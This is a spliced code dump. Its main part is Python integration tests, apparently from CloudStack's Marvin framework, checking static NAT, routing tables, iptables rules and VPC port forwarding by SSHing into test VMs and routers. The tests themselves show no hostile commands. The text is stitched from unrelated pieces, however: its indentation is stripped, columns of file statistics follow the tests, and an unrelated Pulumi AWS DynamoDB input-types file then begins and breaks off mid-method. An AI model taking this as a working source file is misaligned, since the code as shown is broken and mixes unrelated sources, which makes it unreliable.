cls.virtual_machine = VirtualMachine.create(
cls.apiclient,
cls.services["virtual_machine"],
templateid=template.id,
accountid=cls.account.name,
domainid=cls.account.domainid,
serviceofferingid=cls.service_offering.id
)
cls.defaultNetworkId = cls.virtual_machine.nic[0].networkid
cls._cleanup = [
cls.virtual_machine,
cls.account,
cls.service_offering
]
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.cleanup = []
return
@classmethod
def tearDownClass(cls):
try:
cls.apiclient = super(
TestStaticNat,
cls).getClsTestClient().getApiClient()
cleanup_resources(cls.apiclient, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
def tearDown(self):
cleanup_resources(self.apiclient, self.cleanup)
return
@attr(tags=["advanced", "smoke"], required_hardware="true")
def test_static_nat_on_ip_from_non_src_nat_ip_range(self):
"""Test for static nat on a IP which is in pubic IP range different
from public IP range that has source NAT IP associated with network
"""
# Validate the following:
# 1. Create a new public IP range and dedicate to a account
# 2. Acquire a IP from new public range
# 3. Enable static NAT on acquired IP from new range
# 4. Create a firewall rule to open up the port
# 5. Test SSH works to the VM
self.public_ip_range = PublicIpRange.create(
self.apiclient,
self.services["publiciprange"]
)
logger.debug("Dedicating Public IP range to the account");
dedicate_public_ip_range_response = PublicIpRange.dedicate(
self.apiclient,
self.public_ip_range.vlan.id,
account=self.account.name,
domainid=self.account.domainid
)
ip_address = PublicIPAddress.create(
self.apiclient,
self.account.name,
self.zone.id,
self.account.domainid,
self.services["virtual_machine"]
)
self.cleanup.append(ip_address)
self.cleanup.append(self.public_ip_range)
# Check if VM is in Running state before creating NAT and firewall rules
vm_response = VirtualMachine.list(
self.apiclient,
id=self.virtual_machine.id
)
self.assertEqual(
isinstance(vm_response, list),
True,
"Check list VM returns a valid list"
)
self.assertNotEqual(
len(vm_response),
0,
"Check Port Forwarding Rule is created"
)
self.assertEqual(
vm_response[0].state,
'Running',
"VM state should be Running before creating a NAT rule."
)
# Open up firewall port for SSH
FireWallRule.create(
self.apiclient,
ipaddressid=ip_address.ipaddress.id,
protocol=self.services["natrule"]["protocol"],
cidrlist=['0.0.0.0/0'],
startport=self.services["natrule"]["publicport"],
endport=self.services["natrule"]["publicport"]
)
# Create Static NAT rule
StaticNATRule.enable(
self.apiclient,
ip_address.ipaddress.id,
self.virtual_machine.id,
self.defaultNetworkId
)
try:
logger.debug("SSHing into VM with IP address %s with NAT IP %s" %
(
self.virtual_machine.ipaddress,
ip_address.ipaddress.ipaddress
))
self.virtual_machine.get_ssh_client(ip_address.ipaddress.ipaddress)
except Exception as e:
self.fail(
"SSH Access failed for %s: %s" %
(self.virtual_machine.ipaddress, e)
)
StaticNATRule.disable(
self.apiclient,
ip_address.ipaddress.id,
self.virtual_machine.id
)
class TestRouting(cloudstackTestCase):
@classmethod
def setUpClass(cls):
testClient = super(TestRouting, cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.services = testClient.getParsedTestDataConfig()
cls.hypervisor = testClient.getHypervisorInfo()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.apiclient)
cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["zoneid"] = cls.zone.id
template = get_template(
cls.apiclient,
cls.zone.id,
cls.services["ostype"]
)
if template == FAILED:
assert False, "get_template() failed to return template with description %s" % cls.services[
"ostype"]
# Create an account, network, VM and IP addresses
cls.account = Account.create(
cls.apiclient,
cls.services["account"],
admin=True,
domainid=cls.domain.id
)
cls.services["publiciprange"]["zoneid"] = cls.zone.id
cls.service_offering = ServiceOffering.create(
cls.apiclient,
cls.services["service_offerings"]["tiny"]
)
cls.hostConfig = cls.config.__dict__["zones"][0].__dict__["pods"][0].__dict__["clusters"][0].__dict__["hosts"][0].__dict__
cls.virtual_machine = VirtualMachine.create(
cls.apiclient,
cls.services["virtual_machine"],
templateid=template.id,
accountid=cls.account.name,
domainid=cls.account.domainid,
serviceofferingid=cls.service_offering.id
)
cls._cleanup = [
cls.virtual_machine,
cls.account,
cls.service_offering
]
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.cleanup = []
return
@classmethod
def tearDownClass(cls):
try:
cls.apiclient = super(
TestRouting,
cls).getClsTestClient().getApiClient()
cleanup_resources(cls.apiclient, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
def tearDown(self):
cleanup_resources(self.apiclient, self.cleanup)
return
@attr(tags=["advanced", "smoke"], required_hardware="true")
def test_routing_tables(self):
"""Test routing table in case we have IP associated with a network which is in
different pubic IP range from that of public IP range that has source NAT IP.
When IP is associated we should see a new route table created.
When IP is associated we should see a that route table is deleted.
"""
# Validate the following:
# 1. Create a new public IP range and dedicate to a account
# 2. Acquire a IP from new public range
# 3. Create a firewall rule to open up the port, so that IP is associated with network
# 5. Login to VR and verify routing tables, there should be Table_eth3
# 6. Delete firewall rule, since its last IP, routing table Table_eth3 should be deleted
self.public_ip_range = PublicIpRange.create(
self.apiclient,
self.services["publiciprange"]
)
self._cleanup.append(self.public_ip_range)
logger.debug("Dedicating Public IP range to the account");
dedicate_public_ip_range_response = PublicIpRange.dedicate(
self.apiclient,
self.public_ip_range.vlan.id,
account=self.account.name,
domainid=self.account.domainid
)
ip_address = PublicIPAddress.create(
self.apiclient,
self.account.name,
self.zone.id,
self.account.domainid,
self.services["virtual_machine"]
)
self.cleanup.append(ip_address)
self.cleanup.append(self.public_ip_range)
# Check if VM is in Running state before creating NAT and firewall rules
vm_response = VirtualMachine.list(
self.apiclient,
id=self.virtual_machine.id
)
self.assertEqual(
isinstance(vm_response, list),
True,
"Check list VM returns a valid list"
)
self.assertNotEqual(
len(vm_response),
0,
"Check Port Forwarding Rule is created"
)
self.assertEqual(
vm_response[0].state,
'Running',
"VM state should be Running before creating Firewall rule."
)
# Open up firewall port for SSH, this will associate IP with VR
firewall_rule = FireWallRule.create(
self.apiclient,
ipaddressid=ip_address.ipaddress.id,
protocol=self.services["natrule"]["protocol"],
cidrlist=['0.0.0.0/0'],
startport=self.services["natrule"]["publicport"],
endport=self.services["natrule"]["publicport"]
)
# Get the router details associated with account
routers = list_routers(
self.apiclient,
account=self.account.name,
domainid=self.account.domainid,
)
router = routers[0]
if (self.hypervisor.lower() == 'vmware'
or self.hypervisor.lower() == 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
router.linklocalip,
'ip route list table Table_eth3',
hypervisor=self.hypervisor
)
else:
hosts = list_hosts(
self.apiclient,
id=router.hostid,
)
self.assertEqual(
isinstance(hosts, list),
True,
"Check for list hosts response return valid data"
)
host = hosts[0]
host.user = self.hostConfig['username']
host.passwd = self.hostConfig['password']
try:
result = get_process_status(
host.ipaddress,
22,
host.user,
host.passwd,
router.linklocalip,
'ip route list table Table_eth3'
)
except KeyError:
self.skipTest(
"Provide a marvin config file with host\
credentials to run %s" %
self._testMethodName)
logger.debug("ip route list table Table_eth3: %s" % result)
public_range_gateway = self.services["publiciprange"]["gateway"]
default_route_rule = "default via " + public_range_gateway + " dev eth3 proto static"
logger.debug("default route result: %s" % str(result[0]))
self.assertEqual(
default_route_rule,
str(result[0]),
"Check default route table entry for public ip range"
)
res = str(result)
self.assertEqual(
res.count("throw") == 2,
True,
"Check routing rules to throw rest of the traffic. Count shoule be Atleast 2 for the control and guest traffic "
)
firewall_rule.delete(self.apiclient)
if (self.hypervisor.lower() == 'vmware'
or self.hypervisor.lower() == 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
router.linklocalip,
'ip route list table Table_eth3',
hypervisor=self.hypervisor
)
else:
hosts = list_hosts(
self.apiclient,
id=router.hostid,
)
self.assertEqual(
isinstance(hosts, list),
True,
"Check for list hosts response return valid data"
)
host = hosts[0]
host.user = self.hostConfig['username']
host.passwd = self.hostConfig['password']
try:
result = get_process_status(
host.ipaddress,
22,
host.user,
host.passwd,
router.linklocalip,
'ip route list table Table_eth3'
)
except KeyError:
self.skipTest(
"Provide a marvin config file with host\
credentials to run %s" %
self._testMethodName)
logger.debug("ip route list table Table_eth3: %s" % result)
res = str(result)
self.assertEqual(
res.count("default via"),
0,
"Check to ensure there should not be any default rule"
)
self.assertEqual(
res.count("throw"),
0,
"Check to ensure there should not be any throw rule"
)
class TestIptables(cloudstackTestCase):
@classmethod
def setUpClass(cls):
testClient = super(TestIptables, cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.services = testClient.getParsedTestDataConfig()
cls.hypervisor = testClient.getHypervisorInfo()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.apiclient)
cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["zoneid"] = cls.zone.id
template = get_template(
cls.apiclient,
cls.zone.id,
cls.services["ostype"]
)
if template == FAILED:
assert False, "get_template() failed to return template with description %s" % cls.services[
"ostype"]
# Create an account, network, VM and IP addresses
cls.account = Account.create(
cls.apiclient,
cls.services["account"],
admin=True,
domainid=cls.domain.id
)
cls.services["publiciprange"]["zoneid"] = cls.zone.id
cls.service_offering = ServiceOffering.create(
cls.apiclient,
cls.services["service_offerings"]["tiny"]
)
cls.hostConfig = cls.config.__dict__["zones"][0].__dict__["pods"][0].__dict__["clusters"][0].__dict__["hosts"][0].__dict__
cls.virtual_machine = VirtualMachine.create(
cls.apiclient,
cls.services["virtual_machine"],
templateid=template.id,
accountid=cls.account.name,
domainid=cls.account.domainid,
serviceofferingid=cls.service_offering.id
)
cls._cleanup = [
cls.virtual_machine,
cls.account,
cls.service_offering
]
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.cleanup = []
return
@classmethod
def tearDownClass(cls):
try:
cls.apiclient = super(
TestIptables,
cls).getClsTestClient().getApiClient()
cleanup_resources(cls.apiclient, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
def tearDown(self):
cleanup_resources(self.apiclient, self.cleanup)
return
@attr(tags=["advanced", "smoke"], required_hardware="true")
def test_iptable_rules(self):
"""Test iptable rules in case we have IP associated with a network which is in
different pubic IP range from that of public IP range that has source NAT IP.
When IP is associated we should see a rule '-i eth3 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT' in FORWARD table.
When IP is dis-associated we should see a rule in the FORWARD table is deleted.
"""
# Validate the following:
# 1. Create a new public IP range and dedicate to a account
# 2. Acquire a IP from new public range
# 3. Create a firewall rule to open up the port, so that IP is associated with network
# 5. Login to VR and verify routing tables, there should be Table_eth3
# 6. Delete firewall rule, since its last IP, routing table Table_eth3 should be deleted
self.public_ip_range = PublicIpRange.create(
self.apiclient,
self.services["publiciprange"]
)
self._cleanup.append(self.public_ip_range)
logger.debug("Dedicating Public IP range to the account");
dedicate_public_ip_range_response = PublicIpRange.dedicate(
self.apiclient,
self.public_ip_range.vlan.id,
account=self.account.name,
domainid=self.account.domainid
)
ip_address = PublicIPAddress.create(
self.apiclient,
self.account.name,
self.zone.id,
self.account.domainid,
self.services["virtual_machine"]
)
self.cleanup.append(ip_address)
# Check if VM is in Running state before creating NAT and firewall rules
vm_response = VirtualMachine.list(
self.apiclient,
id=self.virtual_machine.id
)
self.assertEqual(
isinstance(vm_response, list),
True,
"Check list VM returns a valid list"
)
self.assertNotEqual(
len(vm_response),
0,
"Check Port Forwarding Rule is created"
)
self.assertEqual(
vm_response[0].state,
'Running',
"VM state should be Running before creating a NAT rule."
)
# Open up firewall port for SSH
firewall_rule = FireWallRule.create(
self.apiclient,
ipaddressid=ip_address.ipaddress.id,
protocol=self.services["natrule"]["protocol"],
cidrlist=['0.0.0.0/0'],
startport=self.services["natrule"]["publicport"],
endport=self.services["natrule"]["publicport"]
)
# Get the router details associated with account
routers = list_routers(
self.apiclient,
account=self.account.name,
domainid=self.account.domainid,
)
router = routers[0]
if (self.hypervisor.lower() == 'vmware'
or self.hypervisor.lower() == 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
router.linklocalip,
'iptables -t filter -L FORWARD -v',
hypervisor=self.hypervisor
)
else:
hosts = list_hosts(
self.apiclient,
id=router.hostid,
)
self.assertEqual(
isinstance(hosts, list),
True,
"Check for list hosts response return valid data"
)
host = hosts[0]
host.user = self.hostConfig['username']
host.passwd = self.hostConfig['password']
try:
result = get_process_status(
host.ipaddress,
22,
host.user,
host.passwd,
router.linklocalip,
'iptables -t filter -L FORWARD -v'
)
except KeyError:
self.skipTest(
"Provide a marvin config file with host\
credentials to run %s" %
self._testMethodName)
logger.debug("iptables -t filter -L FORWARD -v: %s" % result)
res = str(result)
self.assertEqual(
res.count("eth3 eth0 anywhere anywhere state RELATED,ESTABLISHED"),
1,
"Check to ensure there is a iptable rule to accept the RELATED,ESTABLISHED traffic"
)
firewall_rule.delete(self.apiclient)
class TestVPCPortForwarding(cloudstackTestCase):
@classmethod
def setUpClass(cls):
socket.setdefaulttimeout(60)
testClient = super(TestVPCPortForwarding, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.services = testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["vpc_offering"] = { "name": 'VPC off',
"displaytext": 'VPC off',
"supportedservices": 'Dhcp,Dns,SourceNat,PortForwarding,Vpn,Lb,UserData,StaticNat',
}
cls.services["network_offering"] = {
"name": 'VPC Network offering',
"displaytext": 'VPC Network off',
"guestiptype": 'Isolated',
"supportedservices": 'Vpn,Dhcp,Dns,SourceNat,PortForwarding,Lb,UserData,StaticNat,NetworkACL',
"traffictype": 'GUEST',
"availability": 'Optional',
"useVpc": 'on',
"serviceProviderList": {
"Vpn": 'VpcVirtualRouter',
"Dhcp": 'VpcVirtualRouter',
"Dns": 'VpcVirtualRouter',
"SourceNat": 'VpcVirtualRouter',
"PortForwarding": 'VpcVirtualRouter',
"Lb": 'VpcVirtualRouter',
"UserData": 'VpcVirtualRouter',
"StaticNat": 'VpcVirtualRouter',
"NetworkACL": 'VpcVirtualRouter'
},
}
cls.services["network"] = {
"name": "Test Network",
"displaytext": "Test Network",
"netmask": '255.255.255.0'
}
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.services["publiciprange"]["zoneid"] = cls.zone.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls._cleanup = [cls.service_offering]
return
@classmethod
def tearDownClass(cls):
try:
#Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.account = Account.create(
self.apiclient,
self.services["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = [self.account]
logger.debug("Creating a VPC offering..")
self.vpc_off = VpcOffering.create(
self.apiclient,
self.services["vpc_offering"]
)
self._cleanup.append(self.vpc_off)
logger.debug("Enabling the VPC offering created")
self.vpc_off.update(self.apiclient, state='Enabled')
logger.debug("Creating a VPC network in the account: %s" % self.account.name)
self.services["vpc"]["cidr"] = '10.1.0.0/16'
self.vpc = VPC.create(
self.apiclient,
self.services["vpc"],
vpcofferingid=self.vpc_off.id,
zoneid=self.zone.id,
account=self.account.name,
domainid=self.account.domainid
)
return
def tearDown(self):
try:
#Clean up, terminate the created network offerings
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
logger.debug("Warning: Exception during cleanup : %s" % e)
return
def check_ssh_into_vm(self, vm, public_ip, testnegative=False):
logger.debug("Checking if we can SSH into VM=%s on public_ip=%s" % (vm.name, public_ip.ipaddress.ipaddress))
try:
vm.get_ssh_client(ipaddress=public_ip.ipaddress.ipaddress)
if not testnegative:
logger.debug("SSH into VM=%s on public_ip=%s is successfully" % (vm.name, public_ip.ipaddress.ipaddress))
else:
self.fail("SSH into VM=%s on public_ip=%s is successfully" % (vm.name, public_ip.ipaddress.ipaddress))
except:
if not testnegative:
self.fail("Failed to SSH into VM - %s" % (public_ip.ipaddress.ipaddress))
else:
logger.debug("Failed to SSH into VM - %s" % (public_ip.ipaddress.ipaddress))
def create_natrule(self, vm, public_ip, network, services=None):
logger.debug("Creating NAT rule in network for vm with public IP")
if not services:
services = self.services["natrule"]
nat_rule = NATRule.create(self.apiclient,
vm,
services,
ipaddressid=public_ip.ipaddress.id,
openfirewall=False,
networkid=network.id,
vpcid=self.vpc.id
)
return nat_rule
def acquire_publicip(self, network):
logger.debug("Associating public IP for network: %s" % network.name)
public_ip = PublicIPAddress.create(self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=network.id,
vpcid=self.vpc.id
)
logger.debug("Associated %s with network %s" % (public_ip.ipaddress.ipaddress,
network.id
))
return public_ip
def create_network(self, net_offerring, gateway='10.1.1.1',vpc=None):
try:
logger.debug('Create NetworkOffering')
net_offerring["name"] = "NET_OFF-" + str(gateway)
nw_off = NetworkOffering.create(self.apiclient,
net_offerring,
conservemode=False
)
# Enable Network offering
nw_off.update(self.apiclient, state='Enabled')
self._cleanup.append(nw_off)
logger.debug('Created and Enabled NetworkOffering')
self.services["network"]["name"] = "NETWORK-" + str(gateway)
logger.debug('Adding Network=%s' % self.services["network"])
default_acl = NetworkACLList.list(self.apiclient, name="default_allow")[0]
obj_network = Network.create(self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=nw_off.id,
zoneid=self.zone.id,
gateway=gateway,
aclid=default_acl.id,
vpcid=vpc.id if vpc else self.vpc.id
)
logger.debug("Created network with ID: %s" % obj_network.id)
return obj_network
except Exception as e:
self.fail('Unable to create a Network with offering=%s because of %s ' % (net_offerring, e))
def deployvm_in_network(self, network, host_id=None):
try:
logger.debug('Creating VM in network=%s' % network.name)
vm = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)],
hostid=host_id
)
logger.debug('Created VM=%s in network=%s' % (vm.id, network.name))
return vm
except:
self.fail('Unable to create VM in a Network=%s' % network.name)
@attr(tags=["advanced", "intervlan"], required_hardware="true")
def test_network_services_VPC_CreatePF(self):
""" Test Create VPC PF rules on acquired public ip when VpcVirtualRouter is Running
"""
# Validate the following
# 1. Create a VPC with cidr - 10.1.1.1/16
# 2. Create a Network offering - NO1 with all supported services
# 3. Add network1(10.1.1.1/24) using N01 to this VPC.
# 4. Deploy vm1 in network1.
# 5. Use the Create PF rule for vm in network1.
# 6. Successfully ssh into the Guest VM using the PF rule
network_1 = self.create_network(self.services["network_offering"])
vm_1 = self.deployvm_in_network(network_1)
self.public_ip_range = PublicIpRange.create(
self.apiclient,
self.services["publiciprange"]
)
self._cleanup.append(self.public_ip_range)
logger.debug("Dedicating Public IP range to the account");
dedicate_public_ip_range_response = PublicIpRange.dedicate(
self.apiclient,
self.public_ip_range.vlan.id,
account=self.account.name,
domainid=self.account.domainid
)
public_ip_1 = self.acquire_publicip(network_1)
self.create_natrule( vm_1, public_ip_1, network_1)
self.check_ssh_into_vm(vm_1, public_ip_1, testnegative=False)
self.public_ip_range.release(self.apiclient)
return
class TestVPCStaticNat(cloudstackTestCase):
@classmethod
def setUpClass(cls):
socket.setdefaulttimeout(60)
testClient = super(TestVPCStaticNat, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.services = testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["vpc_offering"] = { "name": 'VPC off',
"displaytext": 'VPC off',
"supportedservices": 'Dhcp,Dns,SourceNat,PortForwarding,Vpn,Lb,UserData,StaticNat',
}
cls.services["network_offering"] = {
"name": 'VPC Network offering',
"displaytext": 'VPC Network off',
"guestiptype": 'Isolated',
"supportedservices": 'Vpn,Dhcp,Dns,SourceNat,PortForwarding,Lb,UserData,StaticNat,NetworkACL',
"traffictype": 'GUEST',
"availability": 'Optional',
"useVpc": 'on',
"serviceProviderList": {
"Vpn": 'VpcVirtualRouter',
"Dhcp": 'VpcVirtualRouter',
"Dns": 'VpcVirtualRouter',
"SourceNat": 'VpcVirtualRouter',
"PortForwarding": 'VpcVirtualRouter',
"Lb": 'VpcVirtualRouter',
"UserData": 'VpcVirtualRouter',
"StaticNat": 'VpcVirtualRouter',
"NetworkACL": 'VpcVirtualRouter'
},
}
cls.services["network"] = {
"name": "Test Network",
"displaytext": "Test Network",
"netmask": '255.255.255.0'
}
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.services["publiciprange"]["zoneid"] = cls.zone.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls._cleanup = [cls.service_offering]
return
@classmethod
def tearDownClass(cls):
try:
#Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.account = Account.create(
self.apiclient,
self.services["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = [self.account]
logger.debug("Creating a VPC offering..")
self.vpc_off = VpcOffering.create(
self.apiclient,
self.services["vpc_offering"]
)
self._cleanup.append(self.vpc_off)
logger.debug("Enabling the VPC offering created")
self.vpc_off.update(self.apiclient, state='Enabled')
logger.debug("Creating a VPC network in the account: %s" % self.account.name)
self.services["vpc"]["cidr"] = '10.1.0.0/16'
self.vpc = VPC.create(
self.apiclient,
self.services["vpc"],
vpcofferingid=self.vpc_off.id,
zoneid=self.zone.id,
account=self.account.name,
domainid=self.account.domainid
)
return
def tearDown(self):
try:
#Clean up, terminate the created network offerings
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
logger.debug("Warning: Exception during cleanup : %s" % e)
return
def check_ssh_into_vm(self, vm, public_ip, testnegative=False):
logger.debug("Checking if we can SSH into VM=%s on public_ip=%s" % (vm.name, public_ip.ipaddress.ipaddress))
try:
vm.get_ssh_client(ipaddress=public_ip.ipaddress.ipaddress)
if not testnegative:
logger.debug("SSH into VM=%s on public_ip=%s is successfully" % (vm.name, public_ip.ipaddress.ipaddress))
else:
self.fail("SSH into VM=%s on public_ip=%s is successfully" % (vm.name, public_ip.ipaddress.ipaddress))
except:
if not testnegative:
self.fail("Failed to SSH into VM - %s" % (public_ip.ipaddress.ipaddress))
else:
logger.debug("Failed to SSH into VM - %s" % (public_ip.ipaddress.ipaddress))
def acquire_publicip(self, network):
logger.debug("Associating public IP for network: %s" % network.name)
public_ip = PublicIPAddress.create(self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=network.id,
vpcid=self.vpc.id
)
logger.debug("Associated %s with network %s" % (public_ip.ipaddress.ipaddress,
network.id
))
return public_ip
def create_network(self, net_offerring, gateway='10.1.1.1',vpc=None):
try:
logger.debug('Create NetworkOffering')
net_offerring["name"] = "NET_OFF-" + str(gateway)
nw_off = NetworkOffering.create(self.apiclient,
net_offerring,
conservemode=False
)
# Enable Network offering
nw_off.update(self.apiclient, state='Enabled')
self._cleanup.append(nw_off)
logger.debug('Created and Enabled NetworkOffering')
self.services["network"]["name"] = "NETWORK-" + str(gateway)
logger.debug('Adding Network=%s' % self.services["network"])
default_acl = NetworkACLList.list(self.apiclient, name="default_allow")[0]
obj_network = Network.create(self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=nw_off.id,
zoneid=self.zone.id,
gateway=gateway,
aclid=default_acl.id,
vpcid=vpc.id if vpc else self.vpc.id
)
logger.debug("Created network with ID: %s" % obj_network.id)
return obj_network
except Exception as e:
self.fail('Unable to create a Network with offering=%s because of %s ' % (net_offerring, e))
def deployvm_in_network(self, network, host_id=None):
try:
logger.debug('Creating VM in network=%s' % network.name)
vm = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)],
hostid=host_id
)
logger.debug('Created VM=%s in network=%s' % (vm.id, network.name))
return vm
except:
self.fail('Unable to create VM in a Network=%s' % network.name)
def create_StaticNatRule_For_VM(self, vm, public_ip, network, services=None):
logger.debug("Enabling static NAT for IP: %s" %public_ip.ipaddress.ipaddress)
if not services:
services = self.services["natrule"]
try:
StaticNATRule.enable(
self.apiclient,
ipaddressid=public_ip.ipaddress.id,
virtualmachineid=vm.id,
networkid=network.id
)
logger.debug("Static NAT enabled for IP: %s" %
public_ip.ipaddress.ipaddress)
logger.debug("Adding NetworkACL rules to make NAT rule accessible")
except Exception as e:
self.fail("Failed to enable static NAT on IP: %s - %s" % (
public_ip.ipaddress.ipaddress, e))
@attr(tags=["advanced", "intervlan"], required_hardware="true")
def test_network_services_VPC_CreatePF(self):
""" Test Create VPC PF rules on acquired public ip when VpcVirtualRouter is Running
"""
# Validate the following
# 1. Create a VPC with cidr - 10.1.1.1/16
# 2. Create a Network offering - NO1 with all supported services
# 3. Add network1(10.1.1.1/24) using N01 to this VPC.
# 4. Deploy vm1 in network1.
# 5. Use the Create PF rule for vm in network1.
# 6. Successfully ssh into the Guest VM using the PF rule
network_1 = self.create_network(self.services["network_offering"])
vm_1 = self.deployvm_in_network(network_1)
self.public_ip_range = PublicIpRange.create(
self.apiclient,
self.services["publiciprange"]
)
self._cleanup.append(self.public_ip_range)
logger.debug("Dedicating Public IP range to the account");
dedicate_public_ip_range_response = PublicIpRange.dedicate(
self.apiclient,
self.public_ip_range.vlan.id,
account=self.account.name,
domainid=self.account.domainid
)
public_ip_1 = self.acquire_publicip(network_1)
self.create_StaticNatRule_For_VM( vm_1, public_ip_1, network_1)
self.check_ssh_into_vm(vm_1, public_ip_1, testnegative=False)
self.public_ip_range.release(self.apiclient)
return
| 41.996169
| 137
| 0.516741
| 5,130
| 54,805
| 5.418908
| 0.0846
| 0.025612
| 0.020576
| 0.012842
| 0.886507
| 0.880931
| 0.872729
| 0.855498
| 0.854419
| 0.844383
| 0
| 0.006881
| 0.40073
| 54,805
| 1,304
| 138
| 42.028374
| 0.83954
| 0.093477
| 0
| 0.80093
| 0
| 0.00093
| 0.133703
| 0.00522
| 0
| 0
| 0
| 0
| 0.022326
| 1
| 0.037209
| false
| 0.008372
| 0.012093
| 0
| 0.07814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37cf77fc741601aa6e077dbfe6167357d096dbf3
| 15,864
|
py
|
Python
|
sdk/python/pulumi_aws/dynamodb/_inputs.py
|
jen20/pulumi-aws
|
172e00c642adc03238f89cc9c5a16b914a77c2b1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/dynamodb/_inputs.py
|
jen20/pulumi-aws
|
172e00c642adc03238f89cc9c5a16b914a77c2b1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/dynamodb/_inputs.py
|
jen20/pulumi-aws
|
172e00c642adc03238f89cc9c5a16b914a77c2b1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities, _tables
__all__ = [
'GlobalTableReplicaArgs',
'TableAttributeArgs',
'TableGlobalSecondaryIndexArgs',
'TableLocalSecondaryIndexArgs',
'TablePointInTimeRecoveryArgs',
'TableReplicaArgs',
'TableServerSideEncryptionArgs',
'TableTtlArgs',
'GetTableServerSideEncryptionArgs',
]
@pulumi.input_type
class GlobalTableReplicaArgs:
def __init__(__self__, *,
region_name: pulumi.Input[str]):
"""
:param pulumi.Input[str] region_name: AWS region name of replica DynamoDB Table. e.g. `us-east-1`
"""
pulumi.set(__self__, "region_name", region_name)
@property
@pulumi.getter(name="regionName")
def region_name(self) -> pulumi.Input[str]:
"""
AWS region name of replica DynamoDB Table. e.g. `us-east-1`
"""
return pulumi.get(self, "region_name")
@region_name.setter
def region_name(self, value: pulumi.Input[str]):
pulumi.set(self, "region_name", value)
@pulumi.input_type
class TableAttributeArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
type: pulumi.Input[str]):
"""
:param pulumi.Input[str] name: The name of the index
:param pulumi.Input[str] type: Attribute type, which must be a scalar type: `S`, `N`, or `B` for (S)tring, (N)umber or (B)inary data
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the index
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Attribute type, which must be a scalar type: `S`, `N`, or `B` for (S)tring, (N)umber or (B)inary data
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
